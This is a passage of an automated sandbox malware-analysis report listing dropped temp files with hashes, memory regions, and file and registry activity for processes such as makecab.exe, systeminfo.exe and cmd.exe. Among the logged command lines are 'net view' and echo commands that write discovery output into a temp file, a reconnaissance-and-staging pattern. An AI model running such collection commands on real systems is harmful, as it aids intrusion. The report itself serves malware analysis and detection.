False
setup.rpt 0.28 KB MD5: 4ed0cf5d46e3db4ece309ebe24f0b967
SHA1: bf437a96bfd320e1ee6b6cda344a4755a90c114d
SHA256: a23d358cf86601d79d0155f9bb65e2e261836dc70a7327f0dc75ef58ab5fa210
SSDeep: 6:vKfSUVUql/ukwT2SVKQv7D0iwj/b+xQTU3a:vKfSwXwbBv7Aiwj65a
False
C:\Users\CIIHMN~1\AppData\Local\Temp\74EE\11F7.tmp 0.00 KB MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SSDeep: 3::
False
C:\Users\CIIHMN~1\AppData\Local\Temp\cab_512_9 0.01 KB MD5: 7b5b6c7bf41e6055abd4e74476e08575
SHA1: 5c05d3a68f69258d236f6d9677cc0a42e399e7cc
SHA256: 2392619f397925a165cf31634781d68b006c396611c425f6c67f338356e47f8f
SSDeep: 3:P:P
False
C:\Users\CIIHMN~1\AppData\Local\Temp\inf_512_4 0.04 KB MD5: d7a4470b27cf1de1786ad19b81eefbe4
SHA1: 3f68784ab4bfb74f700d41422b70dd98eb77df61
SHA256: 858b92ad56d79074ce2e9197af354fe79981fcccdeba6c2f00d59a221206597a
SSDeep: 3:dJgVRl+yQTIpkvn:dq5+Xvn
False
C:\Users\CIIHMN~1\AppData\Local\Temp\inf_512_3 0.03 KB MD5: 1d8f07dabb819941cdabadab2f5afc09
SHA1: cd2108ad525e111702318ebec8f041abe0d2058d
SHA256: 3b89cf396559512c59e50a34fe7ee12e50ae3cc5b0ba5e56133b97adde288b64
SSDeep: 3:NLBoGURzzv:ZeGgzv
False
C:\Users\CIIHMN~1\AppData\Local\Temp\inf_512_2 0.02 KB MD5: 4230347e5849e9c7230227a287ae4a41
SHA1: a3fa042694dc86f05973ac07231c95cf590d606a
SHA256: 2484fa669042204d83d907de45012a2aef7f6687613ce76169097240415b0abd
SSDeep: 3:R0qxv:Rf
False
C:\Users\CIIHMN~1\AppData\Local\Temp\cab_512_5 0.08 KB MD5: 9b7c67062c98970fbeee70e704792806
SHA1: b3cc082505413056d39b66e9ac049956e8fe8f63
SHA256: 6b656634aeac7fd407ef0ef095563851a41af0b0ed7d74250eafb29c04f8205b
SSDeep: 3:3lZjQyiv2PuIX3Nv3BBNDKcwASzGEsKn:rQyivzIX9v33AczAGEn
False
C:\Users\CIIHMN~1\AppData\Local\Temp\2314.bin 0.16 KB MD5: 5d4eabe56040cf50fc08338ee35fe0f8
SHA1: 1ec80404152e299bd532f1b9312faf4ddf8de871
SHA256: ab3a62ca282e1311ee084d4ccc0475f4666e9ef5ac1eec2ba1bfe284e198170b
SSDeep: 3:wkltLl5/GmGl+lElqvIc0lQyiv2PuIX3Nv3BBNDKcwASzGEsKn:wsFGmy+aHlQyivzIX9v33AczAGEn
False
C:\Users\CIIHMN~1\AppData\Local\Temp\cab_512_7 0.08 KB MD5: d1590e9fff9f288b89f78982a6ec02f1
SHA1: 4d8eb883e0994623bfb4d7eaf2b5717e92efb7db
SHA256: d1b27b955b4ee705abdd8135d563f940f39766ff12237b08fde323a8c75a10eb
SSDeep: 3:0lQyiv2PuIX3Nv3BBNDKcwASzGEsKn:0lQyivzIX9v33AczAGEn
False
Host Behavior
File (66)
Operation Filename Additional Information Success Count
Create C:\Users\CIIHMN~1\AppData\Local\Temp\1A70.bin file_attributes = _O_EXCL True 1
Create CAB00512.TMP file_attributes = _O_RDWR, _O_CREAT, _O_EXCL True 2
Create setup.inf file_attributes = _O_RDWR, _O_CREAT True 1
Create setup.rpt file_attributes = _O_RDWR, _O_CREAT True 1
Create C:\Users\CIIHMN~1\AppData\Local\Temp\inf_512_2 file_attributes = _O_WRONLY True 1
Create C:\Users\CIIHMN~1\AppData\Local\Temp\inf_512_3 file_attributes = _O_WRONLY True 1
Create C:\Users\CIIHMN~1\AppData\Local\Temp\inf_512_4 file_attributes = _O_WRONLY True 1
Create C:\Users\CIIHMN~1\AppData\Local\Temp\1A70.bin file_attributes = _O_EXCL True 1
Create C:\Users\CIIHMN~1\AppData\Local\Temp\CAB00512.TMP file_attributes = _O_RDWR, _O_CREAT, _O_EXCL True 1
Create C:\Users\CIIHMN~1\AppData\Local\Temp\cab_512_5 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_DELETE True 1
Create C:\Users\CIIHMN~1\AppData\Local\Temp\cab_512_6 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_DELETE True 1
Create C:\Users\CIIHMN~1\AppData\Local\Temp\cab_512_7 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_DELETE True 1
Create C:\Users\CIIHMN~1\AppData\Local\Temp\cab_512_8 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_DELETE True 1
Create C:\Users\CIIHMN~1\AppData\Local\Temp\cab_512_9 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_DELETE True 1
Create 01D4756785E0F97F09 desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_DELETE True 1
Create C:\Users\CIIHMN~1\AppData\Local\Temp\cab_512_10 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_DELETE True 1
Create C:\Users\CIIHMN~1\AppData\Local\Temp\cab_512_11 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_DELETE True 1
Create C:\Users\CIIHMN~1\AppData\Local\Temp\2314.bin desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_DELETE True 1
Create C:\Users\CIIHMN~1\AppData\Local\Temp\cab_512_12 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_DELETE True 1
Create C:\Users\CIIHMN~1\AppData\Local\Temp\cab_512_13 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_DELETE True 1
Create C:\Users\CIIHMN~1\AppData\Local\Temp\cab_512_14 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_DELETE True 1
Create setup.inf file_attributes = _O_WRONLY | _O_BINARY True 1
Create C:\Users\CIIHMN~1\AppData\Local\Temp\inf_512_2 file_attributes = _O_RDONLY | _O_BINARY True 1
Create C:\Users\CIIHMN~1\AppData\Local\Temp\inf_512_3 file_attributes = _O_RDONLY | _O_BINARY True 1
Create C:\Users\CIIHMN~1\AppData\Local\Temp\inf_512_4 file_attributes = _O_RDONLY | _O_BINARY True 1
Create setup.rpt file_attributes = _O_WRONLY True 1
Get Info 01D4756785E0F97F09 type = file_attributes True 1
Read C:\Users\CIIHMN~1\AppData\Local\Temp\1A70.bin size = 3 True 1
Read C:\Users\CIIHMN~1\AppData\Local\Temp\1A70.bin size = 4096 True 1
Read C:\Users\CIIHMN~1\AppData\Local\Temp\1A70.bin size = 3 True 1
Read C:\Users\CIIHMN~1\AppData\Local\Temp\1A70.bin size = 4096 True 1
Read - size = 32768 True 3
Read - size = 32672 False 1
Read C:\Users\CIIHMN~1\AppData\Local\Temp\CAB00512.TMP size = 8 True 1
Read C:\Users\CIIHMN~1\AppData\Local\Temp\CAB00512.TMP size = 74 True 1
Read C:\Users\CIIHMN~1\AppData\Local\Temp\CAB00512.TMP size = 8 False 1
Read - size = 16 True 1
Read - size = 256 True 1
Read - size = 16 False 1
Read - size = 8 True 1
Read - size = 8 False 1
Read - size = 32768 False 2
Read C:\Users\CIIHMN~1\AppData\Local\Temp\inf_512_2 size = 2048, size_out = 23 True 1
Read C:\Users\CIIHMN~1\AppData\Local\Temp\inf_512_3 size = 2048, size_out = 30 True 1
Read C:\Users\CIIHMN~1\AppData\Local\Temp\inf_512_4 size = 2048, size_out = 40 True 1
Write - size = 16 True 2
Write - size = 19 True 2
Write C:\Users\CIIHMN~1\AppData\Local\Temp\CAB00512.TMP size = 8 True 2
Write C:\Users\CIIHMN~1\AppData\Local\Temp\CAB00512.TMP size = 74 True 1
Write - size = 8 True 2
Write - size = 74 True 1
Write C:\Users\CIIHMN~1\AppData\Local\Temp\CAB00512.TMP size = 36 True 1
Write C:\Users\CIIHMN~1\AppData\Local\Temp\CAB00512.TMP size = 35 True 1
Write C:\Users\CIIHMN~1\AppData\Local\Temp\CAB00512.TMP size = 82 True 1
Write C:\Users\CIIHMN~1\AppData\Local\Temp\CAB00512.TMP size = 4 True 1
Write setup.inf size = 23 True 1
Write setup.inf size = 30 True 1
Write setup.inf size = 40 True 1
Module (3)
Operation Module Additional Information Success Count
Get Handle c:\windows\system32\makecab.exe base_address = 0x7ff6a3bf0000 True 1
Get Handle c:\windows\system32\kernel32.dll base_address = 0x7ff977ab0000 True 1
Get Address c:\windows\system32\kernel32.dll function = HeapSetInformation, address_out = 0x7ff977ad0f40 True 1
System (1)
Operation Additional Information Success Count
Get Info type = Operating System True 1
Process #17: systeminfo.exe
Information Value
ID #17
File Name c:\windows\system32\systeminfo.exe
Command Line systeminfo.exe
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:04:14, Reason: Child Process
Unmonitor End Time: 00:04:24, Reason: Self Terminated
Monitor Duration 00:00:10
Remark No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0xbd0
Parent PID 0xbf0 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs 0xBBC, 0xBAC, 0x2EC, 0x2E8, 0x4B0
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x0000005eafe40000 0x5eafe40000 0x5eafe5ffff Private Memory rw True False False -
pagefile_0x0000005eafe40000 0x5eafe40000 0x5eafe4ffff Pagefile Backed Memory rw True False False -
private_0x0000005eafe50000 0x5eafe50000 0x5eafe56fff Private Memory rw True False False -
pagefile_0x0000005eafe60000 0x5eafe60000 0x5eafe73fff Pagefile Backed Memory r True False False -
private_0x0000005eafe80000 0x5eafe80000 0x5eafefffff Private Memory rw True False False -
pagefile_0x0000005eaff00000 0x5eaff00000 0x5eaff03fff Pagefile Backed Memory r True False False -
pagefile_0x0000005eaff10000 0x5eaff10000 0x5eaff10fff Pagefile Backed Memory r True False False -
private_0x0000005eaff20000 0x5eaff20000 0x5eaff21fff Private Memory rw True False False -
private_0x0000005eaff30000 0x5eaff30000 0x5eaffaffff Private Memory rw True False False -
private_0x0000005eaffb0000 0x5eaffb0000 0x5eaffb6fff Private Memory rw True False False -
systeminfo.exe.mui 0x5eaffc0000 0x5eaffc3fff Memory Mapped File r False False False -
private_0x0000005eaffd0000 0x5eaffd0000 0x5eaffd0fff Private Memory rw True False False -
private_0x0000005eaffe0000 0x5eaffe0000 0x5eb00dffff Private Memory rw True False False -
locale.nls 0x5eb00e0000 0x5eb019dfff Memory Mapped File r False False False -
private_0x0000005eb01a0000 0x5eb01a0000 0x5eb01a0fff Private Memory rw True False False -
pagefile_0x0000005eb01b0000 0x5eb01b0000 0x5eb01b0fff Pagefile Backed Memory r True False False -
pagefile_0x0000005eb01c0000 0x5eb01c0000 0x5eb01c0fff Pagefile Backed Memory r True False False -
private_0x0000005eb0230000 0x5eb0230000 0x5eb023ffff Private Memory rw True False False -
pagefile_0x0000005eb0240000 0x5eb0240000 0x5eb03c7fff Pagefile Backed Memory r True False False -
pagefile_0x0000005eb03d0000 0x5eb03d0000 0x5eb0550fff Pagefile Backed Memory r True False False -
pagefile_0x0000005eb0560000 0x5eb0560000 0x5eb195ffff Pagefile Backed Memory r True False False -
sortdefault.nls 0x5eb1960000 0x5eb1c96fff Memory Mapped File r False False False -
private_0x0000005eb1ca0000 0x5eb1ca0000 0x5eb1d1ffff Private Memory rw True False False -
private_0x0000005eb1d20000 0x5eb1d20000 0x5eb1d9ffff Private Memory rw True False False -
private_0x0000005eb1da0000 0x5eb1da0000 0x5eb1e1ffff Private Memory rw True False False -
pagefile_0x00007df5ff700000 0x7df5ff700000 0x7ff5ff6fffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff698fe0000 0x7ff698fe0000 0x7ff6990dffff Pagefile Backed Memory r True False False -
pagefile_0x00007ff6990e0000 0x7ff6990e0000 0x7ff699102fff Pagefile Backed Memory r True False False -
private_0x00007ff699105000 0x7ff699105000 0x7ff699106fff Private Memory rw True False False -
private_0x00007ff699107000 0x7ff699107000 0x7ff699108fff Private Memory rw True False False -
private_0x00007ff699109000 0x7ff699109000 0x7ff69910afff Private Memory rw True False False -
private_0x00007ff69910b000 0x7ff69910b000 0x7ff69910cfff Private Memory rw True False False -
private_0x00007ff69910d000 0x7ff69910d000 0x7ff69910efff Private Memory rw True False False -
private_0x00007ff69910f000 0x7ff69910f000 0x7ff69910ffff Private Memory rw True False False -
systeminfo.exe 0x7ff6997d0000 0x7ff6997ecfff Memory Mapped File rwx False False False -
wbemsvc.dll 0x7ff96b4a0000 0x7ff96b4b3fff Memory Mapped File rwx False False False -
fastprox.dll 0x7ff96b7d0000 0x7ff96b8c7fff Memory Mapped File rwx False False False -
wbemprox.dll 0x7ff96c2d0000 0x7ff96c2e0fff Memory Mapped File rwx False False False -
version.dll 0x7ff96c360000 0x7ff96c369fff Memory Mapped File rwx False False False -
wbemcomn.dll 0x7ff96df20000 0x7ff96df9efff Memory Mapped File rwx False False False -
framedynos.dll 0x7ff9722a0000 0x7ff9722edfff Memory Mapped File rwx False False False -
mpr.dll 0x7ff973b90000 0x7ff973babfff Memory Mapped File rwx False False False -
rsaenh.dll 0x7ff973e20000 0x7ff973e52fff Memory Mapped File rwx False False False -
cryptsp.dll 0x7ff9741d0000 0x7ff9741e6fff Memory Mapped File rwx False False False -
cryptbase.dll 0x7ff974340000 0x7ff97434afff Memory Mapped File rwx False False False -
sspicli.dll 0x7ff974520000 0x7ff97454bfff Memory Mapped File rwx False False False -
bcryptprimitives.dll 0x7ff974720000 0x7ff97478afff Memory Mapped File rwx False False False -
bcrypt.dll 0x7ff9748a0000 0x7ff9748c7fff Memory Mapped File rwx False False False -
kernel.appcore.dll 0x7ff9749a0000 0x7ff9749aefff Memory Mapped File rwx False False False -
kernelbase.dll 0x7ff9753d0000 0x7ff9755acfff Memory Mapped File rwx False False False -
user32.dll 0x7ff9757b0000 0x7ff9758fdfff Memory Mapped File rwx False False False -
nsi.dll 0x7ff976f70000 0x7ff976f77fff Memory Mapped File rwx False False False -
advapi32.dll 0x7ff976f80000 0x7ff977025fff Memory Mapped File rwx False False False -
msctf.dll 0x7ff977200000 0x7ff97735bfff Memory Mapped File rwx False False False -
shlwapi.dll 0x7ff977360000 0x7ff9773b0fff Memory Mapped File rwx False False False -
msvcrt.dll 0x7ff9773c0000 0x7ff97745cfff Memory Mapped File rwx False False False -
gdi32.dll 0x7ff9774c0000 0x7ff977644fff Memory Mapped File rwx False False False -
sechost.dll 0x7ff9776c0000 0x7ff97771afff Memory Mapped File rwx False False False -
imm32.dll 0x7ff977720000 0x7ff977755fff Memory Mapped File rwx False False False -
oleaut32.dll 0x7ff977760000 0x7ff97781dfff Memory Mapped File rwx False False False -
combase.dll 0x7ff977830000 0x7ff977aabfff Memory Mapped File rwx False False False -
kernel32.dll 0x7ff977ab0000 0x7ff977b5cfff Memory Mapped File rwx False False False -
ws2_32.dll 0x7ff977cb0000 0x7ff977d18fff Memory Mapped File rwx False False False -
clbcatq.dll 0x7ff977d40000 0x7ff977de4fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x7ff977df0000 0x7ff977f15fff Memory Mapped File rwx False False False -
ntdll.dll 0x7ff977f30000 0x7ff9780f1fff Memory Mapped File rwx False False False -
Process #23: cmd.exe
Information Value
ID #23
File Name c:\windows\system32\cmd.exe
Command Line cmd /C "echo -------- >> C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:04:23, Reason: Child Process
Unmonitor End Time: 00:04:23, Reason: Self Terminated
Monitor Duration 00:00:00
OS Process Information
Information Value
PID 0x198
Parent PID 0x834 (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs 0xB40, 0x97C
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x0000009343980000 0x9343980000 0x934399ffff Private Memory rw True False False -
pagefile_0x0000009343980000 0x9343980000 0x934398ffff Pagefile Backed Memory rw True False False -
private_0x0000009343990000 0x9343990000 0x9343996fff Private Memory rw True False False -
pagefile_0x00000093439a0000 0x93439a0000 0x93439b3fff Pagefile Backed Memory r True False False -
private_0x00000093439c0000 0x93439c0000 0x9343abffff Private Memory rw True False False -
pagefile_0x0000009343ac0000 0x9343ac0000 0x9343ac3fff Pagefile Backed Memory r True False False -
pagefile_0x0000009343ad0000 0x9343ad0000 0x9343ad0fff Pagefile Backed Memory r True False False -
private_0x0000009343ae0000 0x9343ae0000 0x9343ae1fff Private Memory rw True False False -
locale.nls 0x9343af0000 0x9343badfff Memory Mapped File r False False False -
private_0x0000009343bb0000 0x9343bb0000 0x9343caffff Private Memory rw True False False -
private_0x0000009343cb0000 0x9343cb0000 0x9343daffff Private Memory rw True False False -
private_0x0000009343db0000 0x9343db0000 0x9343db6fff Private Memory rw True False False -
private_0x0000009343f10000 0x9343f10000 0x9343f1ffff Private Memory rw True False False -
pagefile_0x00007df5ff2b0000 0x7df5ff2b0000 0x7ff5ff2affff Pagefile Backed Memory - True False False -
pagefile_0x00007ff60d790000 0x7ff60d790000 0x7ff60d88ffff Pagefile Backed Memory r True False False -
pagefile_0x00007ff60d890000 0x7ff60d890000 0x7ff60d8b2fff Pagefile Backed Memory r True False False -
private_0x00007ff60d8bb000 0x7ff60d8bb000 0x7ff60d8bcfff Private Memory rw True False False -
private_0x00007ff60d8bd000 0x7ff60d8bd000 0x7ff60d8befff Private Memory rw True False False -
private_0x00007ff60d8bf000 0x7ff60d8bf000 0x7ff60d8bffff Private Memory rw True False False -
cmd.exe 0x7ff60d9c0000 0x7ff60da18fff Memory Mapped File rwx True False False -
kernelbase.dll 0x7ff9753d0000 0x7ff9755acfff Memory Mapped File rwx False False False -
msvcrt.dll 0x7ff9773c0000 0x7ff97745cfff Memory Mapped File rwx False False False -
kernel32.dll 0x7ff977ab0000 0x7ff977b5cfff Memory Mapped File rwx False False False -
ntdll.dll 0x7ff977f30000 0x7ff9780f1fff Memory Mapped File rwx False False False -
Host Behavior
File (24)
Operation Filename Additional Information Success Count
Create C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Get Info C:\Windows\system32 type = file_attributes True 1
Get Info C:\Windows\System32 type = file_attributes True 1
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Get Info STD_OUTPUT_HANDLE type = file_type True 2
Get Info STD_OUTPUT_HANDLE type = size True 1
Open STD_OUTPUT_HANDLE - True 12
Open STD_INPUT_HANDLE - True 3
Read STD_OUTPUT_HANDLE size = 1, size_out = 1 True 1
Write STD_OUTPUT_HANDLE size = 11 True 1
Registry (17)
Operation Key Additional Information Success Count
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 1, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Module (8)
Operation Module Additional Information Success Count
Get Handle c:\windows\system32\cmd.exe base_address = 0x7ff60d9c0000 True 1
Get Handle c:\windows\system32\kernel32.dll base_address = 0x7ff977ab0000 True 2
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 True 1
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x7ff977acd550 True 1
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x7ff977ad25e0 True 1
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x7ff977ad1f90 True 1
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x7ff975423a10 True 1
Environment (11)
Operation Additional Information Success Count
Get Environment String - True 4
Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Get Environment String name = PROMPT False 1
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Get Environment String name = KEYS False 1
Set Environment String name = PROMPT, value = $P$G True 1
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Process #25: cmd.exe
Information Value
ID #25
File Name c:\windows\system32\cmd.exe
Command Line cmd /C "net view >> C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:04:23, Reason: Child Process
Unmonitor End Time: 00:04:37, Reason: Terminated by Timeout
Monitor Duration 00:00:14
OS Process Information
Information Value
PID 0x978
Parent PID 0x834 (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs 0xB10, 0xF0
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x0000002a32480000 0x2a32480000 0x2a3249ffff Private Memory rw True False False -
pagefile_0x0000002a32480000 0x2a32480000 0x2a3248ffff Pagefile Backed Memory rw True False False -
private_0x0000002a32490000 0x2a32490000 0x2a32496fff Private Memory rw True False False -
pagefile_0x0000002a324a0000 0x2a324a0000 0x2a324b3fff Pagefile Backed Memory r True False False -
private_0x0000002a324c0000 0x2a324c0000 0x2a325bffff Private Memory rw True False False -
pagefile_0x0000002a325c0000 0x2a325c0000 0x2a325c3fff Pagefile Backed Memory r True False False -
pagefile_0x0000002a325d0000 0x2a325d0000 0x2a325d0fff Pagefile Backed Memory r True False False -
private_0x0000002a325e0000 0x2a325e0000 0x2a325e1fff Private Memory rw True False False -
locale.nls 0x2a325f0000 0x2a326adfff Memory Mapped File r False False False -
private_0x0000002a326b0000 0x2a326b0000 0x2a326b6fff Private Memory rw True False False -
private_0x0000002a32760000 0x2a32760000 0x2a3285ffff Private Memory rw True False False -
private_0x0000002a32860000 0x2a32860000 0x2a3295ffff Private Memory rw True False False -
private_0x0000002a32a60000 0x2a32a60000 0x2a32a6ffff Private Memory rw True False False -
sortdefault.nls 0x2a32a70000 0x2a32da6fff Memory Mapped File r False False False -
pagefile_0x00007df5ff630000 0x7df5ff630000 0x7ff5ff62ffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff60ce70000 0x7ff60ce70000 0x7ff60cf6ffff Pagefile Backed Memory r True False False -
pagefile_0x00007ff60cf70000 0x7ff60cf70000 0x7ff60cf92fff Pagefile Backed Memory r True False False -
private_0x00007ff60cf97000 0x7ff60cf97000 0x7ff60cf97fff Private Memory rw True False False -
private_0x00007ff60cf9c000 0x7ff60cf9c000 0x7ff60cf9dfff Private Memory rw True False False -
private_0x00007ff60cf9e000 0x7ff60cf9e000 0x7ff60cf9ffff Private Memory rw True False False -
cmd.exe 0x7ff60d9c0000 0x7ff60da18fff Memory Mapped File rwx True False False -
kernelbase.dll 0x7ff9753d0000 0x7ff9755acfff Memory Mapped File rwx False False False -
msvcrt.dll 0x7ff9773c0000 0x7ff97745cfff Memory Mapped File rwx False False False -
kernel32.dll 0x7ff977ab0000 0x7ff977b5cfff Memory Mapped File rwx False False False -
ntdll.dll 0x7ff977f30000 0x7ff9780f1fff Memory Mapped File rwx False False False -
Host Behavior
File (20)
Operation Filename Additional Information Success Count
Create C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Get Info C:\Windows\system32 type = file_attributes True 1
Get Info C:\Windows\System32 type = file_attributes True 1
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Get Info STD_OUTPUT_HANDLE type = size True 1
Open STD_OUTPUT_HANDLE - True 10
Open STD_INPUT_HANDLE - True 3
Read STD_OUTPUT_HANDLE size = 1, size_out = 1 True 1
Registry (17)
Operation Key Additional Information Success Count
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 1, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Process (1)
Operation Process Additional Information Success Count
